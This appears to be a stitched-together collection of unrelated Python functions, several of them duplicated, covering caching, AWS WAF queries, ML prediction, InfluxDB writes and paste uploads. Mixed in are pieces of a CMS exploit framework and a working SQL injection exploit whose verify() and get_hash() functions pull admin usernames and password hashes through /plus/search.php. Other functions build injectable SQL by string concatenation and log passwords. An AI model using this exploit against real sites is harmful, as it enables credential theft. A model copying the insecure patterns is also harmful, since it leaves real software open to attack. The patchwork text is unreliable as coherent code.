def content(userName='', accessLevel='', newUrl='', command='', queryString='', postData='', cookies='', uploadFile=''): ''' What this module does? ''' #==> extracting keys from queryString #==> key = utils.getKey( queryString ) cacheFile = cache.cacheFile('_____', module) # ==> cache.cacheFile( key, module ) # searching for cached data noCache = 0 data = '' if ENABLECACHING is 1: # valid cache found # loading data from cache try: cacheStream = open(cacheFile, 'r') data = pickle.load(cacheStream) cacheStream.close() except IOError: logger.error('failed to load cacheFile: \'%s\'' % cacheFile) noCache = 1 #Needs to load data else: noCache = 1 #Needs to load data if len(data) is 0: noCache = 1 if noCache: # no or out-of date cache, building new one data = buildData(1) # creating cache if ENABLECACHING is 1: try: cacheStream = open(cacheFile, 'w') pickle.dump(data, cacheStream) cacheStream.close() except IOError: logger.error('failed to save cacheFile: \'%s\'' % cacheFile) returnStatus = "200 OK" cnt = buildHtml(data, accessLevel) responseHeaders = [("Content-Type", CONTENT_HTML), ("Content-Length", str(len(cnt)))] return responseHeaders, returnStatus, cnt
def read(path, name, extension='html', access=RO_ACCESS): ''' read() tries to load the selected template and returns its content. ''' fullPath = os.path.join( path, str(name) + ('' if len(extension) and extension[0] == '.' else '.') + extension) if os.path.exists(fullPath): logger.debug(' loading template file at \'%s\'' % fullPath) cnt = '' try: fileObject = open(fullPath, 'r') cnt = fileObject.read() fileObject.close() if access == RO_ACCESS: cnt = REGEXP.sub('', cnt) except IOError: logger.error(' can\'t access template file: \'%s\'' % fullPath) return cnt else: logger.error(' template file doesn\'t exist: \'%s\'' % fullPath) return ''
def waf_ipset_ranges(_id): """Retrieves all ipsets' ranges associated to a ipset id """ trace = "aws#waf_ipset_ranges" info("Enter", trace, {"id": _id}) client = boto3.client("waf") ranges = [] response = None try: response = client.get_ip_set(IPSetId=_id) except Exception as e: error("Failed to determine ipset", trace, { "id": _id, "error": e, }) raise e info("Determined ipset", trace, {"ipset": response}) for descriptor in response["IPSet"]["IPSetDescriptors"]: info("Examining descriptor", trace, {"descriptor": descriptor}) ranges.append(descriptor["Value"]) info("Determnied ranges associated to ipset id", trace, { "id": _id, "ranges": ranges, }) info("Exit", trace, {"returns": ranges}) return ranges
def image_dir(ctx, **kwargs): """Predict data using the selected model on a set of images.""" if not models.model_exists(kwargs['model']): raise click.UsageError("Model '{0}' does not exist.".format( kwargs['model']), ctx=ctx) if not weights.weights_exist(kwargs['model'], kwargs['iteration']): raise click.UsageError( "Model '{0}' (iteration: '{1}') does not exist.".format( kwargs['model'], kwargs['iteration']), ctx=ctx) ctx.obj['model'] = kwargs['model'] ctx.obj['weights'] = (kwargs['model'], kwargs['iteration']) logger.info('Scanning for images in `{0}`.'.format(kwargs['input'])) lst = [] for f in os.listdir(kwargs['input']): f_path = os.path.join(kwargs['input'], f) if not lib.utils.valid_image(f_path): continue lst.append(f_path) lst.sort() logger.info('Found {0} images in directory.'.format(len(lst))) X = [] with click.progressbar(label='Loading images...', length=len(lst), show_pos=True) as pbar: for im in lst: im = lib.utils.load_image(im) X.append(im) pbar.update(1) X = np.array(X) logger.info('Prediction starts.') try: Y = lib.tf.predict(X, ctx.obj['model'], ctx.obj['weights']) except Exception: logger.error("Unrecoverable error.", exc_info=True) exit(1) logger.debug("min(Y)={0}, max(Y)={1}, avg(Y)={2}, var(Y)={3}".format( np.min(Y), np.max(Y), np.average(Y), np.var(Y))) logger.debug("Y.shape={0}, Y.dtype={1}".format(Y.shape, Y.dtype)) with click.progressbar(label='Saving images...', length=len(Y), show_pos=True) as pbar: i = 0 for im in Y: im = lib.utils.save_image( os.path.join(kwargs['output'], os.path.basename(lst[i])), im) pbar.update(1) i += 1 logger.info('Completed predictions on {0} images.'.format(len(Y)))
def default(self, line): """ 无法识别命令时 :param line: :return: """ logger.error("Unknown command: %s" % line)
def update_data_bulk(self, table, db_id, data): """ it updates the test case data in bulk in corresponding table - **parameters**, **types**, **return** and **return types**:: :param table: data base table obj. :type table: data base class :param db_id: db_id. :type db_id: integer :param data: to be modified test case date. :type data: dictionary :return: True : """ try: self.db.query(table).filter_by(id=db_id).update(data) except sqlalchemy.exc.StatementError as err: logger.error(data) raise Exception(err) except Exception as err: logger.warn(err) try: self.db = db() self.db.query(table).filter_by(id=db_id).update(data) except Exception as err: logger.warn('DB connection failed') logger.error(err) raise Exception(err) self.db.commit() self.db.close() return True
def processLeafNode(xmlNode, parentNodeNames): ''' Processes a leaf node of the XML structure and returns a dictionary with the performance data ''' l.logEntryExit("Entering: parentNodeNames: '%s'; xmlNode: '%s', xmlNode.taf: '%s'" % (str(parentNodeNames), xmlNode.get("name"), xmlNode.tag)) statsDataDict = {} statisticDataDictList = [] ## ## Check all available statistics for statClassification in STATISTIC_CLASSIFICATION_LIST: l.debug("Checking for statistic classification: '%s'" % (statClassification)) xPathString = "./" + statClassification for statistics_node in xmlNode.findall(xPathString): l.debug("Processing node: '%s'" % (statistics_node.get("name", "N/A"))) statisticDataDict = {} ## ## Depending on the node tag we have to build out dictionary if statistics_node.tag in STATISTIC_CLASSIFICATION_LIST: statisticDataDict = buildDictFromXmlNode(statistics_node) else: l.error("Invalid tag of XML node found: '%s'. Exiting ..." % (statistics_node.tag)) sys.exit(1) ## ## Append statistic data to returned list statisticDataDictList.append(statisticDataDict) ## ## Create a dictionary to include the tags and the data statsDataDict["tags"] = parentNodeNames statsDataDict["perfdata"] = statisticDataDictList ##### jsonStats = json.dumps(statsDataDict) ##### l.debug("Return list for node '%s' as JSON: '%s'" % (xmlNode.get("name"), str(jsonStats))) l.debug("Returned dictionary for node '%s': '%s'" % (xmlNode.get("name"), str(statsDataDict))) return statsDataDict
def connectSwitch(self, host_ip, u_name, p_word, tc_name): """ Connects to Linux host and checks for software existence - **parameters**, **types**, **return** and **return types**:: :param host_ip: Linux host IP :param u_name: Linux host username :param p_word: Linux host Password :param softwares: List of software to be checked :type host_ip: string :type u_name: string :type p_word: string :type softwares: list """ port = 22 client = paramiko.SSHClient() try: client.load_system_host_keys() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) logger.info('*** Connecting to Switch...') client.connect(host_ip, port, u_name, p_word) stdin, stdout, stderr = client.exec_command('version') client.close() except Exception: msg = "Unable to connect Switch..Hardware requirement failed" \ "Hence skipping test case {}".format(tc_name) logger.error(msg) notify.message(msg) raise Exception(msg)
def do_exploit(self, line): if self.current_plugin: rn = self.plugin_exec() if not rn[0]: logger.error(rn[1]) else: logger.error("获取一个插件")
def writeToInflux(parmInfluxUrl, parmInfluxDb, parmTargetUser, parmTargetPwd, perfList, whitelistDict): ''' writes the data to the influx DB using the write REST API ''' l.debug("writeToInflux with the following parameters: \nparmInfluxUrl: '%s'\n parmInfluxDb: '%s'\n parmTargetUser: '******'\n parmTargetPwd: '%s'\n len(perfList): : '%s'" % (parmInfluxUrl, parmInfluxDb, parmTargetUser, parmTargetPwd, len(perfList))) try: (urlSchema, urlHost, urlPort) = o.splitHttpUrlString(parmInfluxUrl) except Exception as e: raise Exception, sys.exc_info()[1] ## ## influxdb write end-point with query string tmpUri = "/write" tmpUri += o.buildQueryString(db=parmInfluxDb, precision="ms", p=parmTargetPwd, u=parmTargetUser) l.debug("Uri to /write Influx: '%s'" % (tmpUri)) postHeaders = {"Content-type": "text/plain; charset=utf-8", "Accept": "text/plain"} ## ## Number of rows inserted rowCount = 0 ## ## Format the output as a string data = outputFormatter(perfList, outFormat="INFLUX", whitelistDict=whitelistDict) l.verbose("formatted influx data: \n%s", data) ## ## outputFormatter returns a string of the data separated by \n per line postDataDict = data.split("\n") ## ## iterate over the perflist and build the REST API string. ## The "tags" is string of tags separated by NODE_SEPARATOR and the counters will be the fields for postData in postDataDict: l.debug("POST data for write end-point: '%s'" % (postData)) ## ## try: ## ## Get the HTTP Connection httpConn = o.getHttpConnection(urlSchema, urlHost, urlPort) httpConn.request("POST", tmpUri, postData, postHeaders) httpResponse = httpConn.getresponse() responseData = httpResponse.read() httpConn.close() rowCount += 1 except Exception as e2: httpConn.close() errorString = "Failed to write data to influx, '%s'" % (e2.strerror) raise Exception, errorString ## ## indluxDb write returns code 204 if (httpResponse.status != httplib.NO_CONTENT): l.error("Error response data: '%s'" % (responseData)) errorString = "Write to influx db failed with status code: '%d'", httpResponse.status l.error(errorString) httpConn.close() raise Exception, errorString else: l.debug("influx URL ping returned status code: '%d'", httpResponse.status) ## ## Finished - close the connection httpConn.close() l.info("writeToInflux: Number of rows inserted: '%d'" % (rowCount))
def verify(URL): r=requests.get(URL) r.close() if "Request" in r.content: logger.success("Step 1: Exploitable!") else: logger.error("Step 1: It's not exploitable!")
def __init__(self): """parse sync app config""" sync_conf = self.get_config() if len(sync_conf) == 0: logger.error('invalid sync config file') sys.exit(-1) sync_conf.update(unibox.kiosk_conf) self.conf = sync_conf self.server_host = self.conf['sync_server'] self.kiosk_id = self.conf['kioskid'] self.owner_id = self.conf['ownerid'] """sync app request uri""" self.uri_map = { 'ad': self.server_host + '?m=Api&c=Sync&a=ad', 'title': self.server_host + '?m=Api&c=Sync&a=title', 'movie': self.server_host + '?m=Api&c=Sync&a=movie', 'movie_en': self.server_host + '?m=Api&c=Sync&a=movie_en', 'inventory': self.server_host + '?m=Api&c=Sync&a=inventory', 'kiosk_info': self.server_host + '?m=Api&c=Sync&a=kiosk&ownerId=' + self.owner_id + '&kioskId=' + self.kiosk_id, 'slot': self.server_host + '?m=Api&c=Sync&a=slot' } self.db = lib.sqlite.Db(self.sandbox_dir + self.conf['local_db']) self.tmp_folder = self.sandbox_dir + self.conf['local_tmp']
def clone_repo(repo: str, location: Union[Path, str]): """Clone a repo to a specified location. Parameters ---------- repo : str Repo name. location : Union[Path, str] Location to clone the repo to. """ # Format clone command cmd = [ 'git', 'clone', '--depth=1', f'https://github.com/{repo}.git', str(location) ] # Clone try: subprocess.run( cmd, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL ) except subprocess.CalledProcessError: logger.error(f'Failed to clone repo {repo}') raise
def main(argv, is_local=True): # exit if no receiver if not config.TELEGRAM_IDS_SUBSCRIBER: logger.error("No Telegram IDs to notify") return # initialize last_prices = {c.HOURLY: all_exchanges(), c.EVENT: all_exchanges()} # get the last prices and notify while True: is_periodic = utils.true_every_1_hour() current_prices = all_exchanges() logger.info(current_prices) msg, last_prices, has_events_to_notify = voila(current_prices, last_prices, is_periodic) if is_periodic: # hourly notification notify.to_subscribers(msg) elif has_events_to_notify: # by prices and percent changes notify.to_premiums(msg) # check every min time.sleep(c.ONE_MIN_IN_SEC)
def content( userName = '', accessLevel = '', newUrl = '', command = '', queryString = '', postData = '', cookies = '', uploadFile = '' ): ''' What this module does? ''' cacheFile = cache.cacheFile( '_____', module ) # ==> cache.cacheFile( key, module ) # searching for cached data noCache = 0 data = '' if ENABLECACHING is 1: # valid cache found # loading data from cache try: cacheStream = open ( cacheFile, 'r') data = pickle.load( cacheStream ) cacheStream.close () except IOError: logger.error( 'failed to load cacheFile: \'%s\'' % cacheFile ) noCache = 1 #Needs to load data else: noCache = 1 #Needs to load data if len(data) is 0: noCache = 1 if noCache: # no or out-of date cache, building new one data = buildData(userName) #==> To be replaced with a specific call # creating cache if ENABLECACHING is 1: try: cacheStream = open ( cacheFile, 'w') pickle.dump( data, cacheStream ) cacheStream.close() except IOError: logger.error( 'failed to save cacheFile: \'%s\'' % cacheFile ) returnStatus = "200 OK" #==> build content using the selected filter cnt = buildHtml(data) responseHeaders = [ ( "Content-Type", CONTENT_HTML ), ( "Content-Length", str( len( cnt ) ) ) ] return responseHeaders, returnStatus, cnt
def push_content(self): logger.debug('call: ubuntupaste.push_content') conf = config.getConfig() post_target = 'http://paste.ubuntu.com/' logger.debug('post target: ' + post_target) poster = conf.get('ubuntu.user', getpass.getuser()) logger.debug('poster: ' + poster) # Get Filename for highlight. filename = conf.require('src').name if filename == '-': print 'Type your content here, end with EOF' print 'Use Ctrl-C to interrupt, if you have mistyped something.' try: content = conf.require('src').read() except KeyboardInterrupt: logger.warn('Ctrl-C received, interrpted...') sys.exit(1) lines = content.count('\n') bytes = len(content) logger.info('content: %d lines, %d bytes' % (lines, bytes)) lang = conf.get('ubuntu.lang', _get_language(filename)) logger.debug('highlight: ' + lang) post_data = { 'poster' : poster, 'syntax' : lang, 'content' : content, } try: resp = self.req.post(post_target, data=post_data, allow_redirects=False) except exceptions.RequestException as e: logger.info('Exception: ' + e.__class__.__name__) logger.error('Something went wrong when communicating with paste.ubuntu.com!') raise exception.ServerException(e) logger.debug('HTTP OK') logger.info('HTTP Status: %d %s' % (resp.status_code, resp.reason)) if resp.status_code == 302: pastepad = resp.headers['location'] logger.debug('location: ' + pastepad) pattern = re.compile(r'^http:\/\/paste.ubuntu.com/(?P<paste_id>\d+)/$') res = pattern.match(pastepad) if not res: raise exception.ServerException('Unknown location: ' + pastepad) paste_id = res.group('paste_id') logger.info('paste_id: ' + paste_id) # return paste_id print 'Paste ID: ' + str(paste_id) print 'HTTP Link: ' + pastepad return if resp.status_code == 200: data = resp.content err_start_flag = '<ul class="errorlist"><li>' err_stop_flag = '</li></ul>' msg = self.html2text(self.fetch_between(resp.content, err_start_flag, err_stop_flag)) raise exception.ServerException('Server refused our paste: ' + msg) raise exception.ServerException('Server responsed with unknown status %d %s' % (resp.status_code, resp.reason))
def fileDate( filePath ): ''' returns the mtime of the file ''' if not os.path.exists( filePath ): logger.error( "failed to determinate last modified date; path \'%s\' does not exist" % filePath ) return -1 return float( os.path.getmtime( filePath ) )
def TQ(self, sql, args=None): try: self.get_conn(auto_commit=False) rs = self.cur.execute(sql, args) return rs except pymysql.Error as e: error("_query error: %s %s", sql, args, exc_info=True) raise e
def waf_ipsets_ids(_id): """Retrieves all ipsets' ids associated to a waf web acl Retrieves all ipsets' ids associated to a waf web acl. To do so we must follow node relationships, from waf web-acl, to waf rule to ipsets """ trace = "aws#waf_ipsets_ids" info("Enter", trace, { "id": _id, }) ids = None client = boto3.client("waf") response = None try: response = client.get_web_acl(WebACLId=_id) except Exception as e: error("Failed to retrieve waf web-acl", trace, { "id": _id, "error": error, }) raise e info("Determined waf web-acl", trace, { "web_acl": response, }) for rule in response["WebACL"]["Rules"]: info("Examining rule", trace, { "rule": rule, "id": rule["RuleId"], }) try: response = client.get_rule(RuleId=rule["RuleId"]) except Exception as e: error("Failed to determine rule", trace, { "id": rule["RuleId"], "error": error, }) raise e info("Determined rule object", trace, {"rule": response}) # filter out ipset ids ids = [ predicate["DataId"] for predicate in response["Rule"]["Predicates"] if predicate["Type"] == "IPMatch" ] info("Determnied ipset ids associated to web acl", trace, { "acl": _id, "ids": ids, }) info("Exit", trace, {"returns": ids}) return ids
def main(event, context): try: _tickers = event.get("tickers") _position_size = event.get("position-size") _strategy = event.get("strategy") account_alias = event.get("account-alias") kms = Kms() session = get_session() if environ.get("STAGE") == "test": wait_for_db_init(session) candle_repository = CandleRepository(session) account_repository = AccountRepository(session, kms) order_repository = OrderRepository(session) accounts = account_repository.get_all_active_upbit_accounts(alias=account_alias) db_feed = DbFeed(exchange=UpbitExchange.build(accounts[0]), candle_repository=candle_repository) tickers = _tickers or get_trading_tickers() strategy = get_strategy_by_name(name=_strategy) feeds_by_ticker = db_feed.build_feeds_by_ticker(tickers=tickers) strategies_by_ticker = get_trading_strategies_by_ticker(tickers=tickers, override_strategy=strategy) logger.info(f"accounts = {accounts}") orders = [] for account in accounts: send_credential_expiry_reminder(account) exchange = UpbitExchange.build(account) asset_manager = AssetManager(exchange) trader = Trader(asset_manager, exchange, session, account, order_repository) for ticker, strategies in strategies_by_ticker.items(): for strategy in strategies: logger.info(f"trading with strategy = {strategy}, ticker = {ticker}") wait_order = trader.trade(ticker=ticker, strategy=strategy(feeds_by_ticker[ticker]), position_size=_position_size) if wait_order is not None: orders.append(wait_order) return { "statusCode": 200, "body": ",".join([order.get_id() for order in orders]) } except Exception as e: stack = traceback.format_exc() logger.error(e) return { "statusCode": 500, "body": stack }
def do_use(self, plugin): if plugin: try: self.plugin_load(plugin) except Exception, e: print e logger.error("Failed to laod plugin:%s" % plugin) if self.current_plugin: self.prompt = " %s >" % self.current_plugin
def kfold(ctx, **kwargs): """Run K-Fold validation on the selected model.""" if not models.model_exists(kwargs['model']): raise click.UsageError("Model '{0}' does not exist.".format( kwargs['model']), ctx=ctx) model = models.load_model(kwargs['model']) options = { 'batch_size': kwargs['batch_size'], 'epochs': kwargs['epochs'], 'learning_rate': kwargs['learning_rate'] } flags = ['no-save'] if kwargs['no_early_stopping'] is True: flags.append('no-early-stopping') seed = lib.tf.set_seed(kwargs['seed']) dataset = load_dataset(kwargs['dataset'], kwargs['batch_size'], flags, seed) kfold = sklearn.model_selection.KFold(n_splits=kwargs['k_value'], shuffle=True, random_state=seed) fold_no = 1 metrics_all = [] for idx_train, idx_test in kfold.split(dataset): try: logger.info("Current process memory usage: {0:.3f} MB.".format( resource.getrusage(resource.RUSAGE_SELF).ru_maxrss / (10**3))) logger.info("Training run {0}/{1}.".format(fold_no, kwargs['k_value'])) ds_train = dataset.slice(idx_train) ds_test = dataset.slice(idx_test) model_nn, metrics = lib.tf.train(kwargs['model'], ds_train, ds_test, None, seed, flags, options) metrics_all.append(metrics) except Exception: logger.error("Unrecoverable error.", exc_info=True) exit(1) fold_no += 1 logger.info("Averaged metrics:") final_metrics = np.average(metrics_all, axis=0) model.metrics(final_metrics, logger) final_metrics_std = np.std(metrics_all, axis=0) for i, std in enumerate(final_metrics_std): logger.info('STD ({0}): {1:.6f}'.format(i, std))
def sync_kiosk(self): sync_start = time.time() req_url = self.uri_map['kiosk_info'] if self.force_sync is True: self.db.execute("DELETE FROM kiosk") version_num = self.db.get_max_version('kiosk', seq_field='kiosk_id') req_url = lib.inet.encode_url(req_url, {'version_num': version_num}) logger.info('sync kiosk info from ' + req_url) json_data = lib.inet.fetch_data(req_url) if json_data is None or len(json_data) == 0: self.update_ini() logger.info('already updated, end sync') return if type(json_data) is tuple and json_data[0] == '[err]': """failed to fetch data""" logger.error(str(json_data)) return """delete kiosk other than this kiosk_id""" # del_kiosk=db.execute("DELETE FROM kiosk WHERE kiosk_id != " + items.kiosk_id) # logger.info('removed '+str(del_kiosk)+' kiosk which kioskId != ' + items.kiosk_id ) """begin update kiosk""" field = [ 'kiosk_id', 'owner_id', 'kiosk_name', 'indoor', 'machine_serial', 'kiosk_model', 'kiosk_image', 'kiosk_status', 'state_code', 'city_name', 'location', 'reg_date', 'close_date', 'remote_service_ip', 'remote_service_port', 'remote_service_password', 'remote_ip', 'remote_port', 'remote_password', 'tax_rate', 'address', 'zipcode', 'remark', 'latitude', 'longitude', 'version_num' ] data_kiosk = {} if type(json_data) is dict: json_data = [json_data] for r in json_data: item = {} for key in field: if key in r: if key == 'kiosk_id' and r[key] == '': continue else: item[key] = r[key] else: item[key] = '' data_kiosk[r['kiosk_id']] = item field, params = lib.util.unpack_data(data_kiosk) aff_rows = self.db.replace_many('kiosk', field, params) logger.info('end sync kiosk_info, updated ' + str(aff_rows) + ' rows of kiosk') self.update_ini() sync_end = time.time() logger.info('time elapsed ' + str(sync_end - sync_start) + 'sec\n')
def fileDate(filePath): ''' returns the mtime of the file ''' if not os.path.exists(filePath): logger.error( "failed to determinate last modified date; path \'%s\' does not exist" % filePath) return -1 return float(os.path.getmtime(filePath))
def do_search(self, keyword): if keyword: print "\n查询EXP\n=============\n" print "%-40s%-40s%s" % ("名字", "范围", "描述") print "%-40s%-40s%s" % ("----", "-------", "-----------") for name, scope, description in self.search_plugin(keyword): print "%-40s%-40s%s" % (name, scope, description) print else: logger.error("search <keyword>")
def getNodes(wasCellName, root): ''' Returns a list of performance records ''' l.logEntryExit("Entering: root: '%s'; wasCellName: '%s'" % (str(root), wasCellName)) nodeName = None serverName = None statName = None parentNodeNames = "" statRtnList = [] ## ## Check for a valid file via the root node tag (PerformanceMonitor) l.debug("XML tag of the root node is: '%s'" % (root.tag)) if (root.tag == "PerformanceMonitor"): responseStatus = root.get('responseStatus') if (responseStatus != 'success'): l.error("PerformanceMonitor responseStatus indicates an invalid file!") else: l.verbose("PerformanceMonitor responseStatus indicates a valid file!") ## ## process sub-nodes for nodeNode in root.findall("./Node"): l.verbose("Processing xmlNode.tag: '%s'" % (nodeNode.tag)) parentNodeNames += wasCellName ## ## Node nodes if (nodeNode.tag == "Node"): nodeName = nodeNode.get('name') parentNodeNames += NODE_SEPARATOR parentNodeNames += nodeName l.debug("nodeName set to: '%s'" % (nodeName)) ## ## Server nodes for serverNode in nodeNode.findall("./Server"): if (serverNode.tag == "Server"): serverName = serverNode.get('name') parentNodeNames += NODE_SEPARATOR parentNodeNames += serverName l.debug("serverName set to: '%s'" % (serverName)) ## ## Get all Stats nodes of the server node for statNode in serverNode.findall("./Stat"): if (statNode.tag == "Stat"): statName = statNode.get('name') l.debug("Found child node with name: '%s'" % (statNode.get("name"))) debugList = getStatsData(parentNodeNames, statNode) statRtnList += debugList l.debug("JSON-0 debugList: '%s'" % (str(json.dumps(debugList)))) l.debug("JSON-1 statRtnList: '%s'" % (str(json.dumps(statRtnList)))) else: l.debug("Expected nodeNode.tag to be \"Node\" but got: '%s'" % (nodeNode.tag)) return statRtnList
def validate_hitachi_software(self, ip, u_name, pwd, model, serial_number, port, licenses, tcname): """ Connects to Hitachi host and checks for License existence - **parameters**, **types**, **return** and **return types**:: :param host_ip: Hitachi array IP :param u_name: Hitachi array username :param p_word: Hitachi array Password :param softwares: List of software to be checked :type host_ip: string :type u_name: string :type p_word: string :type softwares: List :return: Returns None """ base_URL = "https://"+ip+":"+str(port)+"/ConfigurationManager"+\ "/v1/objects/storages/" try: logger.info('*** Connecting to Hitachi Array...') resp = requests.get(base_URL, auth=(u_name, pwd), verify=False) data = resp.json() for array in data['data']: if array['model'] == model and \ array['serialNumber'] == int(serial_number): sdid = array['storageDeviceId'] logger.info('connection to Hitachi successfull,' 'Hence starting test case execution.') url = base_URL + sdid + '/' + 'licenses' resp = requests.get(url, auth=(u_name, pwd), verify=False) out = resp.json() for dev in out['data']: for pro in licenses: if dev['programProductName'] == pro: if dev['status'] == 'Installed': msg = "Required Software {} is installed".format( pro) logger.info(msg) else: msg = ( 'Required software {} is {}.Hence Skipping the ' 'Test case {}...'.format( pro, dev['status'], tcname)) raise Exception(msg) else: msg = "Provided Hitachi model is not registered with "\ "rest server / Management server" logger.error(msg) raise Exception(msg) except Exception as err: notify.message(str(err)) logger.error(err) raise Exception(err)
def info(self,arg): try: data=re.sub('[\'\"]',' ',str(requests.get("http://127.0.0.1:8775/scan/"+arg+"/data").json()['data'])) if data!="": self.cu.execute("UPDATE info SET DATA='" + str(data) + "' WHERE SESSION='" + str(arg) + "';") self.conn.commit() return data else: return "没有数据" except: logger.error("查询错误")
def do_exploit(self, line): """ 执行插件 :return: """ if self.current_plugin: rn = self.exec_plugin() if not rn[0]: logger.error(rn[1]) else: logger.error("Select a plugin first.")
def get_hash(url): r=requests.get(url) r.close() try: result=re.search(r"Duplicate entry \'(.*?)' for key", r.content).group(1) username=result.split("|")[1] password=result.split("|")[2] return (username,password) except: logger.error("Finish! Can't get hash!\nBut you can try it by hand!\n")
def get_hash(url): r=requests.get(url) r.close() try: result=re.search(r"Duplicate entry \'(.*?)' for key", r.content).group(1) username=result.split("|")[1] password=result.split("|")[2] logger.success("Step 2:") return (username,password) except: logger.error("Step 2: Finish! It's not exploitable!\nIf step 1 is exploitable,you can try it by hand!\n")
def getStatsData(parentNodeNames, xmlNode): ''' Returns the recursive stats records from the current node. Note: The result is a List of Dictionaries ''' l.logEntryExit("Entering: parentNodeNames: '%s'; xmlNode: '%s'" % (str(parentNodeNames), xmlNode.get("name"))) parentNodeNames += NODE_SEPARATOR parentNodeNames += xmlNode.get("name") l.debug("Added to parentNodeNames: '%s'. New parentNodeNames is:\n '%s'" % (xmlNode.get("name"), str(parentNodeNames))) ## ## Do we have sub statistcs subStatNode = xmlNode.find("./Stat") if (subStatNode != None): subStatNodeList = [] ## ## process all sub Stat nodes for subStatNode in xmlNode.findall("./Stat"): subStatNodeName = subStatNode.get("name") l.debug("processing subStatNode: '%s'" % (subStatNodeName)) getStatsDataResult = getStatsData(parentNodeNames, subStatNode) l.debug("Returning from recursion; getStatsDataResult is: '%s'" % (str(json.dumps(getStatsDataResult)))) if (isinstance(getStatsDataResult, DictType)): subStatNodeList.append(getStatsDataResult) elif (isinstance(getStatsDataResult, ListType)): subStatNodeList += getStatsDataResult else: l.error("Type of returned getStatsDataResult is invalid. Exiting ...") ## l.error("Got '%s' back" % (str(getStatsDataResult))) sys.exit(1) ## ## Some PMI data objects contain accumulated values as well (like for example JDBC Provider) subNodeStatsDict = processLeafNode(xmlNode, parentNodeNames) l.debug("Statistics Dictionary for Stat node: '%s'" % (str(subNodeStatsDict))) ## ## We add dictionary only to the returned list if there are data if (len(subNodeStatsDict["perfdata"]) > 0): l.debug("appending subNodeStatsDict: '%s'" % (str(json.dumps(subNodeStatsDict)))) subStatNodeList.append(subNodeStatsDict) return subStatNodeList else: ## ## No sub Stat nodes --> a leaf found. l.debug("Leaf node: '%s' found" % (xmlNode.get("name"))) subStatNodeList = [] leafNodeResult = processLeafNode(xmlNode, parentNodeNames) ## ## We return a list! subStatNodeList.append(leafNodeResult) return subStatNodeList
def do_stop(self, arg): try: if self.start_status: Sniff.sniff_stop(self.m) self.prompt = "[*]探测装置->" logger.info("暂停") self.start_status = False else: logger.error('Sniff未开启') except Exception, e: print e logger.error("Sniff暂停失败")
def _perform_auth(self, otp_token=None): if otp_token is None: try: self.user = raw_input('Username: '******'user: '******'Password: '******'password ok.') except KeyboardInterrupt: logger.warn('Ctrl-C detected.') sys.exit(1) user = self.user pwd = self.pwd logger.info('auth: fetch new token') post_json = { 'scopes' : ['gist'], 'note' : 'paste.py @ ' + str(datetime.datetime.now()), 'note_url' : 'https://github.com/jackyyf/paste.py', } post_headers = { 'Content-Type' : 'application/json', } if otp_token is not None: post_headers['X-GitHub-OTP'] = otp_token post_str = json.dumps(post_json) post_url = _api_base + '/authorizations' logger.debug('post_url: ' + post_url) try: resp = self.req.post(post_url, data=post_str, headers=post_headers, auth=(user, pwd)) except exceptions.RequestException as e: raise exception.ServerException(e) logger.info('http ok. response: %d %s' % (resp.status_code, resp.reason)) if resp.status_code == 201: logger.info('auth ok.') token = resp.json()[u'token'] logger.debug(resp.content) self.req.headers['Authorization'] = 'token ' + token return token elif resp.status_code == 401: # Two factor auth? logger.warn('auth failed') if 'X-GitHub-OTP' in resp.headers: logger.warn('auth: two-factor required') try: token = raw_input('Two factor token from ' + resp.headers['X-Github-OTP'].replace('required; ', '') + ':') except KeyboardInterrupt: logger.warn('Ctrl-C detected') sys.exit(1) return self._perform_auth(otp_token=token) else: logger.error('username or password error.') return self._perform_auth() else: raise exception.ServerException('Server responsed with unknown status: %d %s' % (resp.status_code, resp.reason))
def init(self): try: self.cu.execute("DROP TABLE info;") self.cu.execute("DROP TABLE sniff") self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);") self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);") logger.success("初始化成功") except: logger.error("初始化错误") logger.info("从新建立数据库") self.cu.execute("CREATE TABLE info (SESSION STRING,STATUS STRING,URL STRING,DATA TEXT);") self.cu.execute("CREATE TABLE sniff (SESSION STRING,METHOD STRING,URL STRING,COOKIE STRING,DATA TEXT);") logger.success("建立成功")
def verify(URL): r=requests.get(URL+"/plus/search.php?keyword=as&typeArr[%20uNion%20]=a") r.close() if "Request Error step 1" in r.content: logger.success("Step 1: Exploitable!") result=get_hash(URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\\'`+]=a") return result elif "Request Error step 2" in r.content: logger.success("Step 2: Exploitable!") result=get_hash(URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\\'`+]=a") return result else: logger.error("It's not exploitable!")
def do_search(self, keyword): """ 搜索插件 :param keyword: string, 关键字 :return: """ if keyword: print "\nMatching Plugins\n================\n" print "%-40s%-40s%s" % ("Name", "Scope", "Description") print "%-40s%-40s%s" % ("----", "-------", "-----------") for name, scope, description in self.search_plugin(keyword): print "%-40s%-40s%s" % (name, scope, description) print else: logger.error("search <keyword>")
def do_use(self, plugin): """ 加载插件 :param plugin: string, 插件名称 :return: """ if plugin: try: self.load_plugin(plugin) except Exception: logger.error("Failed to load plugin: %s" % plugin) if self.current_plugin: self.prompt = "CMS Exploit Framework > %s > " % \ self.current_plugin else: logger.error("use <plugin>")
def __exit__(self, exc_type, exc_val, exc_tb): # 添加对with语句的支持 try: if self.cur: self.cur.close() except: pass try: if self.db: self.close() except: pass if exc_type: error('%s', traceback.format_exc()) return True # suppress exception
def findLatestDate( path ): ''' Finds the latest date of modify of any file in a directory structure ''' logger.debug( "finding latest file mtime in %s" % path ) if not str(ENABLECACHING).lower() in [ 'true', '1', 'on', 'enabled' ]: logger.debug( "caching is disabled in the configuration file" ) return -1 if not os.path.exists( path ): logger.error( "failed to determinate last modified date; path \'%s\' does not exist" % path ) return -1 out = subprocess.Popen( shlex.split("find %s -type f -printf \"%%T@\n\"" % path ), stdout = subprocess.PIPE ).communicate()[0] maxd = -1 for i in out.split('\n'): if i.strip() and float(i) > maxd: maxd = float(i) return maxd
